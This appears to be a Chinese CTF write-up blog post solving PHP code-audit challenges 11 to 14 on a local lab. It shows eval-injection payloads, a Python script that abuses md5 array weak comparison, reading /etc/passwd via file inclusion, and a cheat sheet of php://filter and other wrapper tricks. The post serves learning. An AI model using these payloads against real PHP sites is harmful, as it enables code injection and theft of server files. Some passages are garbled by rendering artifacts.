<!DOCTYPE html>
<html lang="zh-cn">
  <head>
    <meta charset="utf8"/>
    <meta name="viewport" content="initial-scale=1.0, width=device-width"/>
    <title>
      
        Challenge-11-20 | Blanks'Blog
      
    </title>
    <meta name="description" content=""/>
    <meta name="keywords" content=""/>
    
      <link rel="apple-touch-icon"
            sizes="180x180"
            href="/images/apple-touch-icon.png"/>
    
    
      <link rel="icon"
            type="image/png"
            sizes="32x32"
            href="/images/favicon-32x32.png"/>
    
    
      <link rel="icon"
            type="image/png"
            sizes="16x16"
            href="/images/favicon-16x16.png"/>
    
    
      <link rel="mask-icon"
            href="/images/logo.svg"
            color=""/>
    
    
    
      
  <style>
    @font-face {
        font-family:sourceHanSerif;
        src: url(/font/regular.ttf);
        font-weight: regular;
    }
  </style>

  <style>
    @font-face {
        font-family:sourceHanSerif;
        src: url(/font/bold.ttf);
        font-weight: bold;
    }
  </style>


    
    <link rel="stylesheet"
          type="text/css"
          href='/css/layout.css'/>
    
    
  <link rel="stylesheet" type="text/css" href="/css/post.css" />
  

  <meta name="generator" content="Hexo 6.3.0"></head>
  <body>
    <div class="head">
      <div class="nav">
        <a href='/' class="nav-logo">
          <img alt="logo" height="60px" width="60px" src="/images/logo.svg"/>
        </a>
        <input id="navBtn" type="checkbox"/>
        <div class="nav-menu">
          
            
              <a class="nav-menu-item" href="/%E5%AD%A6%E4%B9%A0">Notes</a>
            
          
          
        </div>
        <label class="nav-btn" for="navBtn"></label>
      </div>
    </div>
    <div class="body">
      
  <article class="post-content">
    <div class="post-inner--toc">
      <div class="post-content__head">
        <div class="post-title">Challenge-11-20</div>
        <div class="post-info">
          
  <a href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" class="post-tag">#PHP代码审计</a>


          <span class="post-date">2023-03-23</span>
        </div>
      </div>
      
        <aside class="toc-outer">
          <div class="toc-title">目录</div>
          <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Eleven</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Twelve</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Thirteen</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Fourteen</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Fifteen</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Sixteen</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Seventeen</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link"><span class="post-toc-text">$_SERVER的数组信息表</span></a></li></ol></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Eighteen</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Nineteen</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link"><span class="post-toc-text">Twenty</span></a></li></ol>
          <a href="#" class="toc-top">回到顶部</a>
        </aside>
      
      <div class="post-content__body">
        
          <div class="post-gallery">
            
          </div>
        
        <meta name="referrer" content="no-referrer">



<p><a name="Eleven"></a></p>
<h1><span id="eleven">Eleven</span></h1><p>docker   又拉取失败 <br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679279711693-3cd298dd-43dc-4491-ba47-cc28996b844e.png#averageHue=%23121212&clientId=u1ce9842f-122a-4&from=paste&height=399&id=ubabbd901&name=image.png&originHeight=399&originWidth=1071&originalType=binary&ratio=1&rotation=0&showTitle=false&size=66327&status=done&style=none&taskId=u6ced93a6-b1cd-4c42-ad44-b2cebd0cb5e&title=&width=1071#averageHue=%23121212&id=OwHHy&originHeight=399&originWidth=1071&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>这不是11题嘛 为啥copy 10 <br>解决方法：<br>在根目录创建 challenge10.php  代码改成11题的代码就好了 <br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679279797814-1162aa11-5b38-4014-ad34-8266145cd379.png#averageHue=%230e0e0e&clientId=u1ce9842f-122a-4&from=paste&height=544&id=u7ebf0a44&name=image.png&originHeight=544&originWidth=1082&originalType=binary&ratio=1&rotation=0&showTitle=false&size=90688&status=done&style=none&taskId=uf4629069-31a1-463d-907f-084492a9f7a&title=&width=1082#averageHue=%230e0e0e&id=L3MJm&originHeight=544&originWidth=1082&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679279662653-2880e5a0-3692-4992-81c2-30c5e6d71c5d.png#averageHue=%23dddddd&clientId=u1ce9842f-122a-4&from=paste&height=945&id=u9bb611e2&name=image.png&originHeight=945&originWidth=1197&originalType=binary&ratio=1&rotation=0&showTitle=false&size=33095&status=done&style=none&taskId=u09766683-bb9c-46b3-aee2-08aadffa8df&title=&width=1197#averageHue=%23dddddd&id=EtIKG&originHeight=945&originWidth=1197&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">include</span> <span class="hljs-string">&quot;flag.php&quot;</span>;<br><span class="hljs-variable">$a</span> = @<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;hello&#x27;</span>];<br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/^\w*$/&#x27;</span>,<span class="hljs-variable">$a</span> ))&#123;<br>  <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;ERROR&#x27;</span>);<br>&#125;<br><span class="hljs-keyword">eval</span>(<span class="hljs-string">&quot;var_dump($<span class="hljs-subst">$a</span>);&quot;</span>);<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>全局使用的值  <img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?a%20=%20@#card=math&code=a%20%3D%20%40&id=pyxev">_REQUEST[‘hello’];<br>正则匹配</p>
<blockquote>
<p>if(!preg_match(‘&#x2F;^\w*<img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?/%27,#card=math&code=%2F%27%2C&id=BlR7L">a )){<br>die(‘ERROR’);<br>}</p>
</blockquote>
<p>要求hello的输入必须为数字 和 字母</p>
<blockquote>
<p>eval(“var_dump($$a);”);<br>show_source(<strong>FILE</strong>);</p>
</blockquote>
<p>存在eval()函数，查看是否可以进行闭合var_dump()，造成命令执行。<br>存在过滤了符号，无法闭合，所以不能通过闭合var_dump()造成命令执行。<br>不过，发现var_dump()中存在$$a，可以输出对应的变量值，但是需要指定包含flag文件里面的变量值<br>但是》》》<br>PHP中还存在一个特殊的变量，引用全局作用域中可用的全部变量:</p>
<blockquote>
<p>$GLOBALS</p>
</blockquote>
<p>使用var(<img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?GLOBALS">%20%20%E7%9A%84%E4%BE%8B%E5%AD%90%3Cbr%20%2F%3E!%5Bimage.png%5D(https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2023%2Fpng%2F22356351%2F1679281075329-e7b4d1d6-37df-4847-8164-d1a29fbd5a2d.png%23averageHue%3D%2523b09b50%26clientId%3Du1ce9842f-122a-4%26from%3Dpaste%26height%3D1050%26id%3Du7081636c%26name%3Dimage.png%26originHeight%3D1050%26originWidth%3D1955%26originalType%3Dbinary%26ratio%3D1%26rotation%3D0%26showTitle%3Dfalse%26size%3D444807%26status%3Ddone%26style%3Dnone%26taskId%3Du2ca27eaf-d57e-41aa-85bd-944fb7962fa%26title%3D%26width%3D1955)%3Cbr%20%2F%3E%E8%BF%99%E6%A0%B7%E5%AD%90%E5%B0%B1%E5%8F%AF%E4%BB%A5dump%20%E5%87%BA%20include%20%E5%8C%85%E5%90%AB%E7%9A%84%E6%96%87%E4%BB%B6%E4%BA%86%20%3Cbr%20%2F%3E%E5%85%B6%E4%B8%ADglobal%E5%92%8C#card&#x3D;math&amp;code&#x3D;GLOBALS%29%20%20%E7%9A%84%E4%BE%8B%E5%AD%90%3Cbr%20%2F%3E%21%5Bimage.png%5D%28https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2023%2Fpng%2F22356351%2F1679281075329-e7b4d1d6-37df-4847-8164-d1a29fbd5a2d.png%23averageHue%3D%2523b09b50%26clientId%3Du1ce9842f-122a-4%26from%3Dpaste%26height%3D1050%26id%3Du7081636c%26name%3Dimage.png%26originHeight%3D1050%26originWidth%3D1955%26originalType%3Dbinary%26ratio%3D1%26rotation%3D0%26showTitle%3Dfalse%26size%3D444807%26status%3Ddone%26style%3Dnone%26taskId%3Du2ca27eaf-d57e-41aa-85bd-944fb7962fa%26title%3D%26width%3D1955%29%3Cbr%20%2F%3E%E8%BF%99%E6%A0%B7%E5%AD%90%E5%B0%B1%E5%8F%AF%E4%BB%A5dump%20%E5%87%BA%20include%20%E5%8C%85%E5%90%AB%E7%9A%84%E6%96%87%E4%BB%B6%E4%BA%86%20%3Cbr%20%2F%3E%E5%85%B6%E4%B8%ADglobal%E5%92%8C&amp;id&#x3D;S96IB)GLOBALS的区别:<br>$GLOBALS[‘var’]是外部全局变量的本身，而global <img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?var%E5%88%99%E6%98%AF%E5%A4%96%E9%83%A8#card=math&code=var%E5%88%99%E6%98%AF%E5%A4%96%E9%83%A8&id=tquCy">var的同名引用或者说是指针，也就是说global函数产生一个指向函数外部变量的别名变量，而不是真正的函数外部变量，而$GLOBALS[]确确实实调用的是外部的变量，函数内外都会始终保持一致。</p>
<p>所以payload :<br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679281541952-0dd3e8c1-3f9a-43d6-94e4-aff2562b77a1.png#averageHue=%23d6d6d5&clientId=u1ce9842f-122a-4&from=paste&height=967&id=u84e25b11&name=image.png&originHeight=967&originWidth=1280&originalType=binary&ratio=1&rotation=0&showTitle=false&size=59169&status=done&style=none&taskId=u943b6958-a172-4d88-9d86-6defd88f771&title=&width=1280#averageHue=%23d6d6d5&id=Wja6k&originHeight=967&originWidth=1280&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>直接引用$GLOBALS<br>然后eval执行var_dump(GLOBALS) ;<br>就dump 出flag了 ；</p>
<p><a name="Twelve"></a></p>
<h1><span id="twelve">Twelve</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679281986391-9dac5fea-96b2-4134-80e5-73592ab3b6f1.png#averageHue=%23141414&clientId=u56d98e17-2b43-4&from=paste&height=367&id=u6ac835fb&name=image.png&originHeight=367&originWidth=1115&originalType=binary&ratio=1&rotation=0&showTitle=false&size=59990&status=done&style=none&taskId=u63ea8893-b5b2-4245-bfab-02644156604&title=&width=1115#averageHue=%23141414&id=Ng8vN&originHeight=367&originWidth=1115&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>老出错 。。。<br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679282082640-8dbecb22-1baa-437d-abdd-f1238f9a6c23.png#averageHue=%23dddddd&clientId=u56d98e17-2b43-4&from=paste&height=939&id=udf0f9b28&name=image.png&originHeight=939&originWidth=1247&originalType=binary&ratio=1&rotation=0&showTitle=false&size=31434&status=done&style=none&taskId=u30713ba7-f437-412b-b26c-972fc35da67&title=&width=1247#averageHue=%23dddddd&id=eqRiq&originHeight=939&originWidth=1247&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>和上一题很像啊<br>直接输出了<img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?a%EF%BC%8C%E4%B9%9F%E5%B0%B1%E6%98%AFhello%E5%8F%82%E6%95%B0%E7%9A%84%E5%80%BC%EF%BC%8C%E8%80%8C%E4%B8%94%E9%A2%98%E7%9B%AE%E6%98%BE%E7%A4%BAflag%E4%B9%9F%E4%B8%8D%E5%9C%A8%E5%8F%98%E9%87%8F%E4%B8%AD%EF%BC%8C%E4%B9%9F%E6%97%A0%E6%B3%95%E4%BD%BF%E7%94%A8%E4%B8%8A%E4%B8%80%E9%A2%98%E7%9A%84#card=math&code=a%EF%BC%8C%E4%B9%9F%E5%B0%B1%E6%98%AFhello%E5%8F%82%E6%95%B0%E7%9A%84%E5%80%BC%EF%BC%8C%E8%80%8C%E4%B8%94%E9%A2%98%E7%9B%AE%E6%98%BE%E7%A4%BAflag%E4%B9%9F%E4%B8%8D%E5%9C%A8%E5%8F%98%E9%87%8F%E4%B8%AD%EF%BC%8C%E4%B9%9F%E6%97%A0%E6%B3%95%E4%BD%BF%E7%94%A8%E4%B8%8A%E4%B8%80%E9%A2%98%E7%9A%84&id=uMgZ3">GLOBALS超全局变量进行遍历，也没有过滤啥。<br>考虑闭合var_dump($a)函数并构造其他的语句进行执行</p>
<blockquote>
<p>eval函数<br>eval() 函数把字符串按照 PHP 代码来计算。<br>该字符串必须是合法的 PHP 代码，且必须以分号结尾return 语句会立即终止对字符串的计算。<br>返回值： 除非在代码字符串中调用 return 语句，则返回传给 return 语句的值，否则返回 NULL。如果代码字符串中存在解析错误，则 eval() 函数返回 FALSE。</p>
</blockquote>
<blockquote>
<p>var_dump函数<br>var_dump() 函数用于输出变量的相关信息。<br>var_dump() 函数显示关于一个或多个表达式的结构信息，包括表达式的类型与值。数组将递归展开值，通过缩进显示其结构。</p>
</blockquote>
<blockquote>
<p>print_r() 函数用于打印变量，以更容易理解的形式展示。<br>PHP 版本要求: PHP 4, PHP 5, PHP 7</p>
</blockquote>
<blockquote>
<p>file() 函数把整个文件读入一个数组中。<br>数组中的每个元素都是文件中相应的一行，包括换行符在内。<br>语法<br>file(path,include_path,context)</p>
</blockquote>
<p>直接闭合打印flag.php 文件</p>
<blockquote>
<p>payload ：<br>?hello&#x3D;);print_r(file(“flag.php”));&#x2F;&#x2F;<br>这里可以使用var_dump  也可以使用 print_r<br>?hello&#x3D;);var_dump(file(“flag.php”));&#x2F;&#x2F;</p>
</blockquote>
<p><a name="Thirteen"></a></p>
<h1><span id="thirteen">Thirteen</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679538647990-1923c8a8-c507-4a2b-9949-163aae338cc2.png#averageHue=%23fefefe&clientId=ubaa973c0-20fe-4&from=paste&height=524&id=uab7cb472&name=image.png&originHeight=524&originWidth=920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=13188&status=done&style=none&taskId=u5e09c573-33a6-418e-af2e-7c699e2b614&title=&width=920#averageHue=%23fefefe&id=ekMIH&originHeight=524&originWidth=920&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>函数分析：</p>
<blockquote>
<p>mt_srand()<br>mt_srand() 播种 Mersenne Twister 随机数生成器。<br>注释：自 PHP 4.2.0 起，不再需要用 srand() 或 mt_srand() 函数给随机数发生器播种，现已自动完成。</p>
</blockquote>
<blockquote>
<p>PHP随机函数<br>PHP随机函数主要有rand、mt_rand、array_rand，还有随机”排列”(打乱顺序)的函数shuffle、str_shuffle，以及能够产生唯一ID的uniqid。<br>1、rand()<br>• rand()函数返回随机整数。<br>• 如果没有提供可选参数 min 和 max，rand() 返回 0 到 RAND_MAX 之间的伪随机整数。例如，想要 5 到 15（包括 5 和 15）之间的随机数，用 rand(5, 15)。<br>• rand()函数是使用libc的随机数发生器生成随机数的，一般较慢，且有不确定因素。<br>• 其中getrandmax()函数可以返回rand函数能够产生的最大的随机数，在设置rand()函数第二个参数时可以设置为getrandmax()的返回值。</p>
</blockquote>
<blockquote>
<p>mt_rand()函数<br>• mt_rand() 使用 Mersenne Twister 算法返回随机整数。<br>• 如果没有提供可选参数 min 和 max，mt_rand() 返回 0 到 RAND_MAX 之间的伪随机数。例如想要 5 到 15（包括 5 和 15）之间的随机数，用 mt_rand(5, 15)。<br>• 很多老的 libc 的随机数发生器具有一些不确定和未知的特性而且很慢。PHP 的 rand() 函数默认使用 libc 随机数发生器。mt_rand() 函数是非正式用来替换它的。该函数用了 Mersenne Twister 中已知的特性作为随机数发生器，它可以产生随机数值的平均速度比 libc 提供的 rand() 快四倍。<br>• 注释：自 PHP 4.2.0 起，不再需要用 srand() 或 mt_srand() 函数给随机数发生器播种，现在已自动完成。</p>
</blockquote>
<blockquote>
<p>array_rand()函数<br>• array_rand() 函数返回数组中的随机键名，或者如果您规定函数返回不只一个键名，则返回包含随机键名的数组。<br>• array_rand() 函数从数组中随机选出一个或多个元素，并返回。<br>• 第二个参数用来确定要选出几个元素。如果选出的元素不止一个，则返回包含随机键名的数组，否则返回该元素的键名。</p>
</blockquote>
<blockquote>
<p>shuffle()函数<br>• shuffle() 函数把数组中的元素按随机顺序重新排列。<br>• 该函数为数组中的元素分配新的键名。已有键名将被删除。</p>
</blockquote>
<blockquote>
<p>str_shuffle()函数<br>• str_shuffle() 函数随机打乱字符串中的所有字符。</p>
</blockquote>
<blockquote>
<p>uniqid()函数<br>• uniqid() 函数基于以微秒计的当前时间，生成一个唯一的 ID。<br>• 语法：<br>uniqid(prefix,more_entropy)<br>• 如果 prefix 参数为空，则返回的字符串有 13 个字符串长。如果 more_entropy 参数设置为 true，则是 23 个字符串长。<br>• 如果 more_entropy 参数设置为 true，则在返回值的末尾添加额外的熵（使用组合线形同余数生成程序），这样可以结果的唯一性更好。<br>• 返回值：以字符串的形式返回唯一标识符。<br>• 注释：由于基于系统时间，通过该函数生成的 ID 不是最佳的。如需生成绝对唯一的 ID，请使用 md5() 函数。<br>• 如果单独使用uniqid()方法，不带任何参数的话，这个方法只能保证单个进程，在同一个毫秒内是唯一的。如果使用uniqid(“”,true)，带了一个墒值，自身已经有一个随机的方法能保证生成的id的随机性。但是由于线性同余是比较简单的生成随机数的算法，随机性有可能还不够。<br>所以大多数采用的方法为：<br>nuiqid(mt_rand(), true)</p>
</blockquote>
<p>主要代码 ：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;whoami&#x27;</span>]==(<span class="hljs-variable">$value</span>[<span class="hljs-number">0</span>].<span class="hljs-variable">$value</span>[<span class="hljs-number">1</span>]) &amp;&amp; <span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$value</span>),<span class="hljs-number">5</span>,<span class="hljs-number">4</span>)==<span class="hljs-number">0</span>)&#123;<br>  <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;nums&#x27;</span>]++;<br>  <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;whoami&#x27;</span>] = <span class="hljs-variable">$str_rands</span>;<br>  <span class="hljs-keyword">echo</span> <span class="hljs-variable">$str_rands</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>其中参数whoami要满足两个条件，一个是满足whoami输入的值与产生的随机值相等，另一个条件就是要满足md5(<img src="https://www.yuque.com/api/services/graph/generate_redirect/latex?value">%E4%BB%8E%E7%AC%AC%E4%BA%94%E4%BD%8D%E5%8F%96%EF%BC%8C%E5%8F%96%E5%9B%9B%E4%BD%8D%EF%BC%8C%E8%83%BD%E5%A4%9F%3D%3D0%EF%BC%8C%E5%85%B6%E4%B8%AD%E5%90%8E%E4%B8%80%E4%B8%AA%E6%9D%A1%E4%BB%B6%E5%85%B6%E5%AE%9E%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87PHP%E7%9A%84%E5%BC%B1%E6%AF%94%E8%BE%83%E6%9D%A5%E8%BF%9B%E8%A1%8C%E5%88%A9%E7%94%A8%EF%BC%8C%E4%B9%9F%E5%B0%B1%E6%98%AF%E8%AF%B4%EF%BC%8C%E5%8F%AA%E8%A6%81%E4%BF%9D%E8%AF%81%E7%AC%AC%E4%BA%94%E4%BD%8D%E5%80%BC%E4%B8%BA%E5%AD%97%E6%AF%8D%EF%BC%8C%E5%B0%B1%E5%8F%AF%E4%BB%A5%E6%BB%A1%E8%B6%B3(md5(#card&#x3D;math&amp;code&#x3D;value%29%E4%BB%8E%E7%AC%AC%E4%BA%94%E4%BD%8D%E5%8F%96%EF%BC%8C%E5%8F%96%E5%9B%9B%E4%BD%8D%EF%BC%8C%E8%83%BD%E5%A4%9F%3D%3D0%EF%BC%8C%E5%85%B6%E4%B8%AD%E5%90%8E%E4%B8%80%E4%B8%AA%E6%9D%A1%E4%BB%B6%E5%85%B6%E5%AE%9E%E5%8F%AF%E4%BB%A5%E9%80%9A%E8%BF%87PHP%E7%9A%84%E5%BC%B1%E6%AF%94%E8%BE%83%E6%9D%A5%E8%BF%9B%E8%A1%8C%E5%88%A9%E7%94%A8%EF%BC%8C%E4%B9%9F%E5%B0%B1%E6%98%AF%E8%AF%B4%EF%BC%8C%E5%8F%AA%E8%A6%81%E4%BF%9D%E8%AF%81%E7%AC%AC%E4%BA%94%E4%BD%8D%E5%80%BC%E4%B8%BA%E5%AD%97%E6%AF%8D%EF%BC%8C%E5%B0%B1%E5%8F%AF%E4%BB%A5%E6%BB%A1%E8%B6%B3%28md5%28&amp;id&#x3D;hha2C)value),5,4) &#x3D;&#x3D; 0 <br>这里可以使用MD5无法处理数组的漏洞<br>还有个条件 ：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;nums&#x27;</span>]&gt;=<span class="hljs-number">10</span>)&#123;<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>在120秒内访问10次，条件满足 ，echo flag<br> payload  ：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br>url = <span class="hljs-string">&quot;http://localhost:23123/challenge10.php&quot;</span><br>session = requests.Session()<br>flag = session.get(url+<span class="hljs-string">&#x27;?value[]=ea&#x27;</span>).text<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">10</span>):<br>    flag = session.get(url+<span class="hljs-string">&#x27;?value[]=&#x27;</span>+ flag[<span class="hljs-number">0</span>:<span class="hljs-number">2</span>]).text<br><span class="hljs-built_in">print</span>(flag)<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679539638830-0a0e3c14-c88b-4de6-aa83-9f15f9d6658f.png#averageHue=%232b2825&clientId=ubaa973c0-20fe-4&from=paste&height=847&id=ud2fc9b62&name=image.png&originHeight=847&originWidth=664&originalType=binary&ratio=1&rotation=0&showTitle=false&size=87199&status=done&style=none&taskId=u99cd2bc7-ac6b-4484-9073-c6a8d2fb6c4&title=&width=664#averageHue=%232b2825&id=VoYeU&originHeight=847&originWidth=664&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<p><a name="Fourteen"></a></p>
<h1><span id="fourteen">Fourteen</span></h1><p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679539920167-88960876-05a4-4bea-b7d3-003eba78429a.png#averageHue=%23eaeae9&clientId=u64f15643-ba77-4&from=paste&height=1143&id=u419e7a18&name=image.png&originHeight=1143&originWidth=1416&originalType=binary&ratio=1&rotation=0&showTitle=false&size=93540&status=done&style=none&taskId=u1dabb24c-6bff-47dc-9318-ec1ad3085ee&title=&width=1416#averageHue=%23eaeae9&id=Tr73s&originHeight=1143&originWidth=1416&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>直接把 path 拼接到  include  里面去了可以直接读取文件 <br>先读取一下passwd <br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679540022208-1eec3aac-b9b1-41d8-81ab-56bb215d7047.png#averageHue=%23d5d4d3&clientId=u64f15643-ba77-4&from=paste&height=906&id=u46e9184f&name=image.png&originHeight=906&originWidth=1573&originalType=binary&ratio=1&rotation=0&showTitle=false&size=79909&status=done&style=none&taskId=u96554721-3447-4663-84e3-fe07acc871d&title=&width=1573#averageHue=%23d5d4d3&id=urIgp&originHeight=906&originWidth=1573&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>但是读取不了 flag文件 <br><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679540113083-42f4b7ba-9ab9-47f5-be65-a3d027556e4b.png#averageHue=%23cbcbcb&clientId=u64f15643-ba77-4&from=paste&height=961&id=u3f7b8ade&name=image.png&originHeight=961&originWidth=1239&originalType=binary&ratio=1&rotation=0&showTitle=false&size=39185&status=done&style=none&taskId=ufddd7c26-de4a-4201-b37d-a03b06de73e&title=&width=1239#averageHue=%23cbcbcb&id=rRYvr&originHeight=961&originWidth=1239&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"></p>
<p>使用php:&#x2F;&#x2F;filter协议</p>
<blockquote>
<p>php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;flag.php<br>php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/22356351/1679540781164-45f123e0-435f-4b70-b2e9-9bd0a694ae4e.png#averageHue=%23d1d1d0&clientId=u64f15643-ba77-4&from=paste&height=969&id=u4d556829&name=image.png&originHeight=969&originWidth=1164&originalType=binary&ratio=1&rotation=0&showTitle=false&size=53867&status=done&style=none&taskId=u6f418cc6-23e1-494a-9a34-2fec206365f&title=&width=1164#averageHue=%23d1d1d0&id=sBvkb&originHeight=969&originWidth=1164&originalType=binary&ratio=1&rotation=0&showTitle=false&status=done&style=none&title=" alt="image.png"><br>就会输出 flag.php 的base64的编码</p>
<blockquote>
<p><strong>文件包含相关函数</strong><br>include<br>require<br>include_once<br>require_once<br>highlight_file <br>show_source <br>readfile <br>file_get_contents <br>fopen<br>file</p>
</blockquote>
<blockquote>
<p><strong>PHP伪协议</strong><br>要满足PHP伪协议，基于函数include和include_once()的利用情况。<br>另外就是PHP.ini环境问题：</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">allow_url_fopen: On 默认开启，选项为On时，激活了URL形式的fopen封装协议，就可以访问URL对象文件<br>allow_url_include: Off  默认关闭，选项为On时，允许包含URL对象文件。<br></code></pre></td></tr></table></figure>

<blockquote>
<p><strong>常用伪协议</strong><br>file:&#x2F;&#x2F; — 访问本地文件系统<br>http:&#x2F;&#x2F; — 访问 HTTP(s) 网址<br>ftp:&#x2F;&#x2F; — 访问 FTP(s) URLs<br>php:&#x2F;&#x2F; — 访问各个输入&#x2F;输出流（I&#x2F;O streams）<br>zlib:&#x2F;&#x2F; — 压缩流<br>data:&#x2F;&#x2F; — 数据（RFC 2397）<br>glob:&#x2F;&#x2F; — 查找匹配的文件路径模式<br>phar:&#x2F;&#x2F; — PHP 归档<br>ssh2:&#x2F;&#x2F; — Secure Shell 2<br>rar:&#x2F;&#x2F; — RAR<br>ogg:&#x2F;&#x2F; — 音频流<br>expect:&#x2F;&#x2F; — 处理交互式的流</p>
</blockquote>
<blockquote>
<p><strong>利用条件</strong><br>1、协议：file:&#x2F;&#x2F;<br>• 利用条件：allow_url_fopen和allow_url_include双Off情况下可正常使用<br>• 说明：访问本地文件系统<br>• 用法：file:&#x2F;&#x2F;文件绝对路径和文件名<br>2、协议：php:&#x2F;&#x2F;<br>• 利用条件：不需要开启allow_url_fopen(仅php:&#x2F;&#x2F;input,php:&#x2F;&#x2F;stdin,php:&#x2F;&#x2F;memory和php:&#x2F;&#x2F;temp需要allow_url_include&#x3D;On)<br>说明：访问IO流<br>• 用法：php:&#x2F;&#x2F;input 可以访问请求的原始数据的只读流,将post请求中的数据作为php代码执行。<br>3、协议：zip:&#x2F;&#x2F;,bzip2:&#x2F;&#x2F;,zlib:&#x2F;&#x2F;<br>• 利用条件：双Off条件下可使用<br>• 说明：zip:&#x2F;&#x2F;test.zip#x.txt zip:&#x2F;&#x2F;绝对路径#子文件名<br>• x.txt内容就会以php代码执行<br>• compress.bzip2:&#x2F;&#x2F;test.bz2和compress.zlib:&#x2F;&#x2F;test.gz用法相同<br>• &#x2F;include.php?file&#x3D;compress.bzip2:&#x2F;&#x2F;绝对路径&#x2F;shell.jpg 或者 compress.bzip2:&#x2F;&#x2F;.&#x2F;shell.jpg<br>• 用法:可以访问压缩文件中的子文件，更重要的是不需要指定后缀名<br>4、协议：data:&#x2F;&#x2F;<br>• 利用条件：双On<br>• 